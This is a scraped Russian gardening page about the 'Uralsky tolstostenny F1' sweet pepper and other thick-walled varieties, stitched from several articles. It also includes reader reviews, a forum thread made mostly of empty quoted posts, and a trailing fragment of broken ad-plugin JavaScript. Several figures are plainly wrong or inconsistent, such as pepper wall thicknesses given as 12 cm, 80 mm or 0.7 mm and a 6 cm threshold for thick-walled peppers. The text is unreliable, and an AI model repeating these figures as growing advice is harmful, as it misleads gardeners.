20 просмотров
Рейтинг статьи
1 звезда 2 звезды 3 звезды 4 звезды 5 звезд
Загрузка...

Перец уральский толстостенный фото отзывы

Описание перца Уральский толстостенный

Перец Уральский толстостенный — гибридный сорт, который имеет толстый околоплодник. Он отличается сладким вкусом и устойчивостью к смене погодных условий.

Описание перца сорта Уральский толстостенный

Характеристика сорта

Стручковая овощная культура уральского вида — раннеспелый сорт с высоким показателем урожайности. Один куст Уральского овоща толстостенного f1 дает примерно 20 овощей (от 5 до 8 кг).

Перец не рекомендуют высаживать туда, где раньше росли пасленовые растения. Перец высаживают в открытый и закрытый грунт в период прохладного лета.

Сладкий перец Уральский толстостенный f1 не любит пересадок перед высадкой в землю. Для посадки используют рассаду или семена.

Овощ рассчитан для выращивания в экстремальных, стрессовых условиях, устойчив ко многим болезням перца и характеризуется универсальностью в выращивании. У него длительный срок созревания.

Рассаду гибрида выращивают на протяжении 2 месяцев. Для высадки в открытый грунт подходящим временем является середина июня, для теплиц — май, после заморозков.

Описание куста

Куст толстостенного перца имеет средний рост (до 70 см). После высадки в грунт его подвязывают. Разновидность растет вверх одним стеблем. На одном кусте примерно 7-10 широких удлиненных листьев.

Это однолетняя овощная культура с одиночными или групповыми листьями в виде розетки. Цветки овоща крупные.

Кусты высаживают за схемой 40 см х 60 см или 3 куста на 1 кв. м в закрытом грунте.

Описание плодов

Согласно описанию, перец Уральский толстостенный имеет раннеспелый мясистый сладкий плод f1. Он имеет призмовидную форму. Вес примерно 250-400 г. Длина достигает 18 см.

Основные характеристики плода Уральского овоща:

  • Во время спелости он зеленого цвета, а в стадии биологического дозревания приобретает насыщенный темно-красный цвет.
  • Толщина овоща до 1 см.
  • Сочный плод со сладким вкусом, без горечи.

Крупный плод подойдет для любого использования. Его употребляют в свежем виде, но чаще используют для холодных салатов. Плоды хороши для консервирования или приготовления лечо, отлично переносят заморозку в холодильной камере.

Сорт устойчив к различным заболеваниям

Вначале нужно определиться с местом посадки. Овощная культура толстостенного растения f1 растет в огороде, пленочных парниках и в теплицах. Устойчивость растения к недугам позволяет выращивать его в любой почве.

Семена овоща всходят от 15 до 20 дней. Для ускорения проращивания рекомендуют использовать смесь воды с соком алое, замачивая в ней семена.

Ухаживать за растением несложно. Основным уходом является:

  • рыхление;
  • полив;
  • пропахивание земли;
  • хороший подкорм.

Неприхотлив сорт и к резким перепадам температуры. Для достижения высокого уровня урожайности ему необходима влажная, теплая и рыхлая земля. Гибрид любит влагу, но важно не переборщить с поливом.

Подкормка

Отличной подкормкой для сорта Уральского является раствор с пометом птиц. Для этого берут ведро воды и небольшой стакан помета (200-250 мл). В грунт также вносят перегной, но уже перед самой посадкой.

Гибридный овощ хорошо реагирует на удобрения минеральными веществами. В летний период добавляют подкормки 3-5 раз на сезон. Растение подкармливают удобрениями с фосфором или калием перед активным цветением и плодоношением. Азотные подкормки используют лишь дозировано, увеличивают зеленную массу.

Полив

Для хорошей урожайности нужно поддерживать влажность грунта. Промачивать грунт на большую глубину необходимо в жаркую погоду.

Толстостенный гибридный перец поливают лишь во время сухих дней, не переливая его. В дождливую погоду в дополнительном поливе нет нужды.

Рыхление

Удалять сорняки необходимо весь сезон. Рыхление делает почву богатой на кислород и способствует качественному плодоношению.

Подкапывать растение нужно по мере необходимости. Для увеличения урожайности собирают крупные овощи еще в технической стадии спелости.

Мульчирование

Идеальным вариантом для овощной культуры Уральского сорта является мульчирование. Используют плодородную мульчу. Для этого берут перегной и усыпают по кругу куста. Вместе с поливом или дождем все питательные вещества попадают в корень.

Мульчирование хорошо сохраняет влажность, не дает грунту покрываться сухой коркой. Мульча делает землю мягкой.

Вредители и болезни

При плохом уходе за растением возможны внешние ухудшения. Слабое растение больше всего подвергается воздействию вредителей.

Основными недугами для гибридного растения считаются:

  • Фитоплазмоз (столбур). Проявляется с верхушки побегов. Листья скручиваются и засыхают. Возможен переход на все растение.
  • Фитофтороз. Начиная с листьев, куст овощной культуры приобретает коричневый цвет, со временем он покрывается темными пятнами.
  • Черная ножка. Она поражает рассаду и семена овощей. Ее признаком является темный стебель, который загнивает и усыхает.
  • Фузариоз. Недуг не лечится — куст выкапывают. Листья желтеют, сосуды в стебле закупориваются.
  • Вертицилез. Его признаки — бледные листья, снижение количества плодов, деформация перцев. Он также не лечится, кусты уничтожают.
  • Пятнистое увядание. Листья окрашиваются в фиолетово-бронзовый цвет. При ухудшении плоды опадают с пятнами в виде разноцветных колец.

Перед тем как использовать профилактические методы, нужно тщательно осмотреть куст или плоды. Рекомендуют ежедневный осмотр для своевременного предотвращения. Для профилактики или борьбы с болезнями:

  • используют «Топсин-М» 0,2% и «Фундазол», которые предотвращают развитие фузариоза;
  • обрабатывают почву раствором с купороса (1 ст. медного купороса разбавляют в 10 л воды);
  • при листовой плесени опрыскивают куст фунгицидами«Барьер», «Заслон»;
  • против вершинной гнили перца за сезон 3 раза добавляют кальцинит 3 или кальциевую селитру.

Иногда листья опрыскивают «Вуксалом». Неизлечимые кусты необходимо сжигать или выбрасывать, чтобы обезопасить остальной урожай. После удаления зараженных растений оставшиеся нужно обработать «Фитоспорином».

Заключение

Перец Уральский толстостенный обладает высокими показателями урожайности. Он имеет иммунитет к большинству недугов. Его плоды сочные и крепкие, поэтому хорошо переносят транспортировку.

Выведенный для самого сурового климата перец — Уральский толстостенный F1: описание сорта и характеристика

Гигантские перцы могут выращивать не только огородники-южане. Для овощеводов из Сибири, Урала есть замечательный гибридный сорт – это Уральский толстостенный F1. У него плоды-великаны с утолщенной мясистой мякотью, насыщенный вкус со сладостью.

Описание и характеристика сорта

Перец Уральский толстостенный F1 по срокам созревания относится к линейке ранних гибридов. Этот перец ценится за выносливость к непогоде, стабильную завязываемость, универсальность возделывания.

Перец сладкий имеет такие признаки плодов:

  • средняя масса 250-300 г;
  • максимальный вес 400-500 г;
  • околоплодник 1 см;
  • консистенция мясистая, плотная, сочная;
  • окраска вишневая;
  • стенка с глянцевыми переливами.

Кусты высаживают возле шпалер в теплицах, на открытых грядках рядом ставят столбики.

Преимущества и недостатки

  • скороспелые значительные урожаи;
  • кулинарная универсальность;
  • хорошая продуктивность;
  • холодостойкость;
  • устойчивость к инфекциям пасленовых;
  • лежкость и сохранность до 5 недель;
  • транспортабельность без риска повреждения.

Минусы:

  • на участке нуждается в достаточном месте, хорошем освещении.

Урожайность

Перец Уральский толстостенный F1 ценится за продуктивность. На 1 м2 вырастает до 10-12,5 кг плодов.

Посадка

Семена прорастают за 15-20 суток. Сроки посева – со 2-3-й декады февраля до конца марта. Семенной материал активируют растительными средствами (сок алоэ с медом), активаторами Новосил, Иммуноцитофит, Эпин.

Какие моменты ухода за рассадой:

  • орошение через пульверизатор;
  • поддержание температурного режима 24-28 градусов;
  • закаливание накануне пересадки в течение недели или до 10 суток;
  • поливы питательными растворами (Малышок, Агрикола, Фертика).

Выращивание и уход

Перец выращивают по стандартной агротехнике.

Подкормка

Для массовых урожаев перцу необходимы удобрения. Хороший прирост плодов дает куриный помет или навоз в форме разведенного раствора. На 10 л воды добавляют 250 мл жидкого настоянного коровяка.

Фосфорные и калийные удобрения обязательны, начиная с фазы цветения. Готовят растворы из суперфосфата, сульфата калия. На 10 л разводят по 1,5-2 ч. л. каждого препарата.

Полив

Перцы высаживают в хорошо политые лунки, в течение первой недели растения не поливают. Это способствует лучшему укреплению корневой массы. Дальнейшая кратность увлажнения – до 2-3 раз в неделю.

Рыхление

Грядки рыхлят 1 раз в 7-10 дней. Лучше проводить рыхление на следующий день после полива. Одновременно выдергивают сорняки (источники паразитов).

Мульчирование

Сохранить влагу, создать благоприятный микроклимат под кустиками помогает мульча. Для перцев применяют солому, сено, перепревшие опилки. Слой должен быть 7-10 см.

Вредители и болезни

Перец Уральский толстостенный F1, несмотря на крепкий иммунитет, может поражаться следующими инфекциями:

Заболевания Признаки
Увядание пятнистое Окраска листьев в фиолетовый цвет

Кольцевидные красочные пятна на плодах

Опадение урожая

Фитоплазмоз Скручивание и засыхание листьев

Процесс распространяется с верхушки

Вертициллез Побледнение листовых пластинок

Деформация листочков

Фитофтороз Буро-коричневые пятна на листочках, плодах
Черная ножка Почернение основание стебля

Усыхание побегов, листьев

Для обработки кустов применяют фунгициды, препараты меди. От фузариоза помогает 0,2% Топсин-М или Фундазол. При заражении плесенями подойдет Заслон, Барьер. Если появились признаки вершинной гнили, готовят кальциевую селитру или кальцинит.

Описание сортов крупного толстостенного перца с фото и отзывами

Сладкий перец — полезный овощ, незаменимый в кулинарии. Больше всего ценятся крупные плоды с мясистой мякотью, которая отличается приятным вкусом и запахом. Как правило, эти свойства зависят от сорта, но характеристики, даваемые производителями, очень примерны.

Так что каждый дачник может сам влиять на результат, соблюдая все агротехнические рекомендации и правила ухода.

Особенности

Основное отличие данной категории перцев — толстый околоплодник (перикарпий). Эта часть овоща и употребляется в пищу. Чем крупнее стенка стручка, тем выше спрос на конкретный сорт. Перцы со стенками о 6 см. и выше относятся к толстостенным.

Огородники интересуются, в первую очередь, лучшими сортами крупного перца для открытой местности. Заметим, что не все самые устойчивые гибриды дают заявленный урожай, если они были выведены на юге, а посажены в центральной России. Так что, покупая семена, нужно смотреть, в каком регионе они были собраны.

Подбирая сорт, надо определиться, где он будет расти: в огороде, теплице, пленочном укрытии. Есть универсальные варианты, подходящие к любым условиям, но в теплицах они дают лучший урожай.

Расскажем о самых известных и полезных по свойствам разновидностях толстостенного перца.

Лучшие сорта

Геракл

Вкусный перец. Плоды весят до 200 граммов, толщина стенок 0,7 мм. Культивируется для переработки и потребления свежим. Среднеспелый. Растение представляет собой устойчивые компактные кусты. Неприхотлив, может расти даже в прохладном климате.

Солнце Италии

Перцы данного сорта применяются повсеместно. Толщина стенок стручка составляет 0,6-0,8 см. Плоды отличаются ярким ароматом, могут весить до 500 г. Относится к среднеспелым вариантам.

Атлант

Урожайный гибрид, устойчивый к большинству болезней. Плоды созревают через 70-75 суток после посадки. Кусты компактные с крупными толстостенными стручками. Длина плодов примерно 22 см., толщина стенок от 9 до 11 мм. Это один из самых вкусных и сочных сортов. Созревшие перцы ярко-красные, удлиненные, конусовидной формы. Весят плоды около 150 граммов. Сорт может расти в сложных условиях и применяться в любых заготовках.

Уральский толстостенный

Ранний гибрид. Может расти и использоваться в любых условиях. Семена продаются уральскими агрофирмами, например, «Уральский Дачник». Плоды крупные, в длину достигают 18 см. Толщина стенок составляет 1 см. Сорт устойчив к распространенным недугам. Как правило, огородники довольны этим гибридом.

Блонди

Раннеспелый гибрид, выведенный сотрудниками компании

«Syngenta AG» (Швейцария), которая считается мировым лидером по изготовлению посадочного материала. Плоды крупные, весят 190-200 г., имеют 4 камеры. Толщина мякоти — 80 мм. Созревшие плоды по цвету напоминают слоновую кость. В стадии биологической спелости они желто-золотые. Сорт не боится вирусов, хорошо адаптируется к жаркому климату, температурным перепадам в воздухе и грунте.

Денис

Сладкий гибридный перец. Плодоносит через 80-90 суток после прорастания семян. Плоды крупные, весят примерно 0,4 кг. Стенки имеют толщину 9 мм. И параметры 18*10 см. Цвет перцев красный, форма кубовидная. Сорт не поражается табачной мозаикой. Высота кустов составляет 0,6-0,7 м. Можно выращивать как в огороде, так и в парнике. Используется для употребления в сыром виде и консерваций.

Толстячок

Среднеспелый сорт. Может расти как в открытом грунте, так и под пленкой. Высота растения 0,5 м. Кусты необходимо обрезать и формировать. Плоды вкусные, весят около 130 граммов. Хорошо хранятся, устойчивы к транспортировке. Растение плохо переносит пикировку и нехватку пространства, так что лучше не сажать больше 3 штук на 1 кв.м.

Красный гигант

Устойчивый сорт, дает хороший урожай даже в уральском и сибирском климате. Завязи образуются независимо от холода, засухи, жары. Этот перец высоко урожайный: с 1 квадратного метра можно снять 10 кг. Плоды крупные, весят до 600 г. Толщина стенок примерно 1 см. Отличается сладким вкусом. Кусты крепкие, высокие, требуют подвязки на шпалеру.

Воловье ухо

Сладкий толстостенный сорт, имеющий стандартный красный цвет, но необычную форму., от которой и происходит название. Плоды тонкие и вытянутые, длина 20 см., масса — 150 г. Растет как на огороде, так и в теплицах. Этот перец первым оказывается на столе. Имеет сочную мякоть с толщиной 80 мм. Не боится основных заболеваний, легко адаптируется к перевозке.

Белое золото

Ранний сорт с очень крупными плодами. Кубовидные стручки весят до 450 г. Они окрашены в жемчужно-желтый цвет с характерным блеском. Толщина стенок 10 мм. Перец обладает пряным вкусом. Растет и в открытом грунте, и в теплице. Используется повсеместно. Посев производят за 60-70 дней до высадки на постоянную территорию. Растение желательно подкармливать комплексными и органическими составами, а также стимуляторами роста.

Сибирский формат

Среднеспелый крупноплодный сорт с ярко-красными плодами. Кусты средние, высотой до 80 см., полуштамбовые. На одном растении формируется до 15 стручков, в каждом из которых 3-4 камеры для семян. Плоды весят примерно 300-450 граммов. Технически спелые перцы темно-зеленые, а в стадии биологической зрелости они темно-красные, глянцевые. Толщина стенок 8-10 мм. Плоды обладают нежной консистенцией, приятным вкусом и ароматом. Сорту необходима плодородная почва, регулярный полив, однако качественный урожай можно собрать в любых условиях.

Бел Гой

Крупноплодный высокорослый сорт. Масса стручков 500-600 г., высота куста 100-120 см. Хорошо завязывает плоды, дает качественный урожай. Стручки темно-красные, конусовидные, очень крупные. Перец относится к среднеранним.

Царица

Раннеспелый высокоурожайный овощ. Многие дачники сажают его из сезона в сезон. Считается супертолстостенным сортом. Толщина стенок составляет 12 см. Отлично чувствует себя и в парниках, и в открытом грунте. Растение не боится большинства болезней и вредителей.

Сибирский бонус

Сорт выведен в Сибири. Отличается красивыми массивными плодами необычной апельсиновой окраски. Кусты сомкнутые, достигают 80 см. в высоту. Перцы завязываются в большом количестве. Технически спелые стручки темно-зеленые. Листва растения густая. Масса плода около 300 г., форма кубовидная. Толстые стенки перцев не содержат капсаицин, отличаются перечным ароматом, сладким вкусом, нежной консистенцией. Плоды легко дозревают, оставаясь такими же упругими.

Альба

Среднеранний крупноплодный перец с высокой товарностью. Плоды желто-белые или красно-оранжевые, крепкие, сочные, с приятным запахом. Масса примерно 100-200 граммов. Форма стручков — тупой конус. Толщина стенок от 7 до 9 см. Высота куста 50-70 см. Техническое созревание плодов длится 116 суток. Овощ любит тепло и влажность. Ему необходимы солнце и защита от ветра. Выращивать лучше рассадным методом.

Белозерка

Среднеранний сладкий гибрид. Перцы созревают дружно, урожайность сорта высокая. Высота куста 40-70 см., листва густая. Плоды средние, широкие, имеют форму конуса. Вес стручка 80-90 г., толщина стенок 60-70 мм. Перец приятен на вкус, ароматный, сочный. Созревающие перцы светло-желтые, а в стадии биологической спелости красные. Плоды долго хранятся. Сорт не боится альтернариоза и вирусных заболеваний. Пригоден для открытого грунта. Плоды используются для разных заготовок, в том числе, консерваций.

Шорокшары

Ранний высокоурожайный сорт. Вегетационный период длится 115-117 суток. Пирамидальные плоды весят от 150 до 250 граммов. Технически спелые плоды светло-желтые, биологически — оранжево-красные. Высота куста 50-70 см., толщина стенок 6-8 мм. Культура требует тепла и высокой влажности, не переносит ветер. Для высадки лучше использовать рассадный способ. Сорт не боится вершинной гнили. Употребляется свежим и консервированным.

Как сажать культуру в открытый грунт?

С момента прорастания семян до формирования плодов проходит примерно 110-125 суток. Температура в этот период должна быть не ниже +20 градусов, поэтому толстостенный перец может расти не во всех областях страны. Лето длится долго только в южных регионах, овощу необходим солнечный свет.

Самая подходящая температура для растения: 26-30 градусов. При +15 часть сортов останавливается в развитии.

Выход из ситуации только один: разделить выращивание перца на 3 ступени:

  • подбор и посев посадочного материала;
  • содержание рассады в условиях дома;
  • помещение молодых растений в открытый грунт

Такой метод называется рассадным и применяется в разных российских регионах.

Отзывы

«Я несколько лет выращивала «Калифорнийское чудо». Использовала свои семена и дома они идеально прорастали. Потом приобретала и другие сорта, но предпочитаю все-таки этот. И стенки толстые, и урожайность высокая, и болезни не пристают. Сорт вас порадует, только надо его хорошо поливать. Этот перец раньше был очень известен, правда технически спелые плоды зеленого цвета, поэтому не всем нравится» (Алла);

«Три года сажаю «Воловье Ухо». Перцы очень вкусные, сочные. «Калифорнийское чудо» сажаю ежегодно, в последний раз оно было желтое. Сорта-выручалочки, не подводят никогда» (София);

«Не думаю, что в наших широтах толстостенный перец получится таким же, как в Африке, ведь здесь не такое тепло. По словам производителей, толщина стенок может быть 9-15 см. Но на наших огородах ожидать этого не нужно, тем более, от всех стручков. Из тропических перцев в российских магазинах популярен только Рамито» (Фаина)

Из комментариев видно, что толстостенные перцы пользуются высоким спросом, благодаря своему аромату, сочности и крупным размерам. Огородники с удовольствием собирают такой урожай. Поскольку культура теплолюбива, нужно обеспечивать ей особые условия ухода, что вполне возможно в средней полосе.

Дачный форум: дача, сад, огород, цветы.

Дачный форум: о даче, о цветах, о вашем приусадебном участке

Толстостенный перец (толщина перекарпия)

Статус: Не в сети

Толстостенный перец (толщина перекарпия)

Сообщение от Jester » 02.02.2010, 22:10

Коллеги, посоветуйте сорта действительно толстостенного сладкого перца.
В инете нашла информацию о Талионе F1 с перекарпием аж 15 мм. Если есть те, кто взращивал это диво — подтвердите или опровергните, пожалуйста.

Статус: Не в сети

Re: Толстостенный перец (толищна стенки перекарпия)

Сообщение от Фаина » 03.02.2010, 15:53

Jester писал(а): Приветствую!

Коллеги, посоветуйте сорта действительно толстостенного сладкого перца.
В инете нашла информацию о Талионе F1 с перекарпием аж 15 мм. Если есть те, кто взращивал это диво — подтвердите или опровергните, пожалуйста.

Статус: Не в сети

Re: Толстостенный перец (толищна стенки перекарпия)

Сообщение от ingen » 08.02.2010, 18:01

Jester писал(а): Приветствую!

Коллеги, посоветуйте сорта действительно толстостенного сладкого перца.
В инете нашла информацию о Талионе F1 с перекарпием аж 15 мм. Если есть те, кто взращивал это диво — подтвердите или опровергните, пожалуйста.

Статус: Не в сети

Сообщение от Jester » 08.02.2010, 19:04

Сообщения: 560 Зарегистрирован: 01.02.2010, 18:01 Откуда: Южный Урал Благодарил (а): 1 раз Поблагодарили: 3 раза

Статус: Не в сети

Сообщение от Наталия72 » 09.02.2010, 09:53

Статус: Не в сети

Сообщение от ingen » 09.02.2010, 13:10

Статус: Не в сети

Сообщение от Jester » 09.02.2010, 17:52

Сообщения: 390 Зарегистрирован: 11.02.2010, 21:52 Откуда: Абакан, д.р. 22.11. Благодарил (а): 389 раз Поблагодарили: 188 раз

Статус: Не в сети

Сообщение от СветаЛето » 13.02.2010, 13:05

Статус: Не в сети

Re: Толстостенный перец (толщина перекарпия)

Сообщение от Alka1973 » 07.03.2010, 17:31

Jester писал(а): Приветствую!

Коллеги, посоветуйте сорта действительно толстостенного сладкого перца.
В инете нашла информацию о Талионе F1 с перекарпием аж 15 мм. Если есть те, кто взращивал это диво — подтвердите или опровергните, пожалуйста.

профи Сообщения: 12341 Зарегистрирован: 11.01.2008, 20:57 Благодарил (а): 39 раз Поблагодарили: 1316 раз

Статус: Не в сети

Сообщение от amplex » 07.03.2010, 17:50

Сообщения: 3420 Зарегистрирован: 10.03.2009, 16:50 Интересы: Цветоводство Откуда: г.Курск, Благодарил (а): 5 раз Поблагодарили: 400 раз

Статус: Не в сети

Сообщение от Альбина Ш. » 07.03.2010, 21:13

И не надо забывать, что урожайность и толстостенность и вкус перцев выращенных на Украине имеет отличие от перцев выращиваемых в средней полосе , все таки солнце у нас разное.

С уважением, Альбина.

Чемпион 2009 Сообщения: 14052 Зарегистрирован: 11.03.2008, 13:51 Откуда: С-Петербург Благодарил (а): 7199 раз Поблагодарили: 5963 раза

Статус: Не в сети

Сообщение от masleno » 07.03.2010, 23:32

Статус: Не в сети

Сообщение от София » 08.03.2010, 01:08

Чемпион 2009 Сообщения: 14052 Зарегистрирован: 11.03.2008, 13:51 Откуда: С-Петербург Благодарил (а): 7199 раз Поблагодарили: 5963 раза

Статус: Не в сети

Сообщение от masleno » 08.03.2010, 02:09

Статус: Не в сети

Сообщение от София » 08.03.2010, 02:38

Оля, я стараюсь. С февраля мужа убалтываю пофотать мои помидоры. А как появился «Фотомарафон» так прохода не даю. Ну ты ж понимаешь что обещанного три года ждут. Вот жду. Терпение лопается — завтра сама начну. (Он проф-й фотограф и о-о-очень ругается если я фотаю. Прям из себя выходит — не так, не правильно. Зачем меня позоришь! Что меня не можешь подождать. )

А что со своим «черноземом» делаю написала в теме «Парнички». viewtopic.php?p=198821#198821
Там кстати тож без подколочек не обошлось.
Весной начну фотографировать именно с этого момента.
На этот год подняла себе планку — хочу толстостенных перцев вырастить. Прям огромных и толстых, таких как сейчас продают в супермаркетах. Марина помогла с семенами таких красавцев


Эт я конечно планку завысила, но будем посмотреть.

Перец крупноплодный толстостенный

Среди семейства паслёновых существуют только четыре вида перцев, родственников картофеля, томатов, баклажанов. Три из них так и остались произрастать дикими видами. Четвёртый вид стал прародителем горьких и сладких сортов.

Стручок, ложная ягода сладкого перца употребляется в пищу. Ценятся высоко сорта и гибриды с толстыми мясистыми стенками. Высокую рентабельность демонстрируют сладкие сорта с перикарпием (толщиной стенки) более 6 мм и крупных размеров.

Любители сладкого овоща, чтобы получить хороший урожай, обязательно строили на своих участках теплицы или парники. За последние несколько лет селекционеры облегчили задачу дачникам и огородникам.

Теперь вырастить крупные сочные перцы можно под открытым небом, при неблагоприятных погодных условиях, даже за короткое лето. Спектр сортов и гибридов настолько широк, что позволяет удовлетворить вкус самых изысканных гурманов.

Алгоритм получения высокого урожая

Сорта сладких перцев имеют одинаковые правила выращивания. Высокорослые перечные кусты обязательно подвязывают. Чувствительные растения к перепадам температур высаживают на укрытые гряды (теплицы, парники). Большинство сладких перцев размножают рассадным методом. Возможность высадки семенами в землю указывается на пакетике с семенами.

Шаги, которые необходимо совершить, чтобы осенью собрать богатый урожай сладких крупноплодных мясистых перцев.

  • Оценить условия на участке. Наличие/отсутствие теплицы или парника; климатическая зона; погодные условия; качество почвы.
  • Приобрести семенной материал нужных сортов, соответствующий параметрам крупноплодных и толстостенных перцев, подходящих к условиям участка.
  • В феврале произвести посев семян в ящики с плодородной почвой для получения здоровой рассады. Ёмкости укрыть плёнкой или стеклом.
  • Во время роста рассады поддерживать тепло в помещении не ниже 23 градусов. При первых всходах стекло следует убрать.
  • Распикировать рассаду по отдельным горшочкам следует при наличии двух настоящих листочках.
  • Подкормить рассаду комплексом удобрений с фосфором, калием и азотом 1-2 раза.
  • В середине мая рассаду выносят на свежий воздух для закаливания перед высадкой.
  • Почву подготавливают под перцы осенью и весной. Её перекапывают, удобряют. Задача – сделать грунт лёгким, дренированным, плодородным с нейтральной кислотностью. На грядах прошлым летом на выбранном участке не должны были расти паслёновые культуры: картофель, томаты, перцы, баклажаны.
  • Все перечные сорта высаживают в почву, которая прогрелась не менее 16 градусов. К этому моменту все весенние заморозки должны закончиться.

Внимание! Крупноплодные толстостенные перцы нуждаются в питательной поддержке чаще. Их подкармливают до 5 раз за сезон. Азотные удобрения увеличивают зелёную массу, применять их следует дозировано.
  • В середине август у крупноплодных толстостенных сортов удаляют цвет и мелкие завязи, появившиеся последними. Они не успеют вызреть, а кусты ослабят.
  • Увеличить плодоношение можно сбором крупных плодов в технической стадии спелости. Сладкие перцы крупноплодных толстостенных сортов хорошо спеют вне куста без потери качества продукта, в коробках, проложенные бумагой. 15-20 дней требуется им для достижения биологической спелости.
  • Объёмы влаги для крупноплодных толстых представителей сладких перцев должны быть немного выше, чем для других сортов. Уровень влажности в почве поддержит мульчирование прикорневой зоны кустов опилками, срезанной травой, соломой. После каждого полива проводят рыхление.
  • Толстостенные крупные плоды нуждаются в обильном солнечном свете. Для этой цели прореживают крону или устанавливают дополнительное освещение в теплицах.
  • В профилактических целях перечные посадки обрабатывают от огородных вредителей и болезней.
  • Удаление сорняков осуществляют весь сезон по мере необходимости.
  • Длительное хранение толстостенных крупноплодных перцев возможно в помещениях не выше 10 градусов при влажности 90%. Витамины и минералы будут в полной сохранности внутри крупных сочных плодах. Мясистые крупноплодные овощи пускают на переработку: лечо, пасты, соления, маринования.

Крупные плоды толстостенных сортов ароматны и имеют превосходный вкус. В одном сочном овоще содержится суточная доза витаминов и минералов для организма.

Крупноплодными называют плоды более 12 см длиной и массой превышающей 200 гр. К группе толстостенных относятся перцы с перикарпием (толщиной стенки) более 6-8 мм. Урожайность сладких перцев с красными, жёлтыми сочными крупными плодами в среднем от 5 до 8 кг с одного куста.

Жёлтый

Рассмотрим сорта толстостенных перцев с крупными «золотыми» плодами.

Белое золото

Сорт сибирской коллекции. Плодоносит в любых условиях. Жёлтые кубовидные плоды наливаются 450 г. Сочный перикарпий 10 мм.

Солнце Италии

На низкорослом растении формируются золотые крупные перцы 500-600 г. Сочная стенка перикарпия – 7 мм. Крупноплодный сорт рекомендован для коммерческого культивирования.

Блонди F1

Гибрид швейцарской селекции. Четырёхкамерные крупные золотисто-жёлтые крупные плоды достигают веса более 200 гр, толщина стенки 8 мм. Гибрид устойчив к заболеваниям. Хорошо переносит жару.

Бугай

Гигантские ярко-жёлтые плоды около 30 см в длину, толстостенные (10 мм), кубовидные, массой до 500 гр.

Красный

Красные толстостенные крупноплодные перцы относятся к любимым среди садоводов и огородников. Эти сорта поражают воображение своими гигантскими размерами плодов.

Атлант

Разные производители считают его, то сортом, то гибридом. Чтобы не ошибиться, семена лучше приобретать в специализированном магазине. Часто толстостенный крупноплодный сладкий сорт выращивают в фермерских хозяйствах. Длина красных крупных перцев 25 см, толщина стенки 11 мм. Масса каждого овоща около 400 гр.

Геракл

Красные крупные (более 12 см) перцы имеют вес 350 гр каждый. Перикарпий кубовидных плодов 10 мм. Хрупкие ветви обязательно подвязывают.

Денис F1

Крупноплодный сорт создан для северных регионов. Толстостенные (9 мм) красные плоды наливаются до 400 гр. Длина плода около 20 см. Один куст даёт около семи крупных сладких сочных перцев, если удалить последние завязи.

Сибирский формат

Крупноплодный сорт-новинка из Сибири. Кубовидные красные плоды в 400 гр. Длина крупного плода более15 см. Стенка толщиной 10 мм. Куст выдерживает до 15 штук крупных плодов.

Уральский толстостенный

Плоды гигантских размеров, более 18 см. Перикарпий 10 мм. Красные сладкие перцы крупного гибрида успешно выращивают в сибирских областях.

Царица F1

Тёмно-красные крупные плоды массой более 200 гр вызревают на компактных кустах гибрида. Перикарпий 10 мм 12 сочных крупных плодов формируется на одном растении.

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
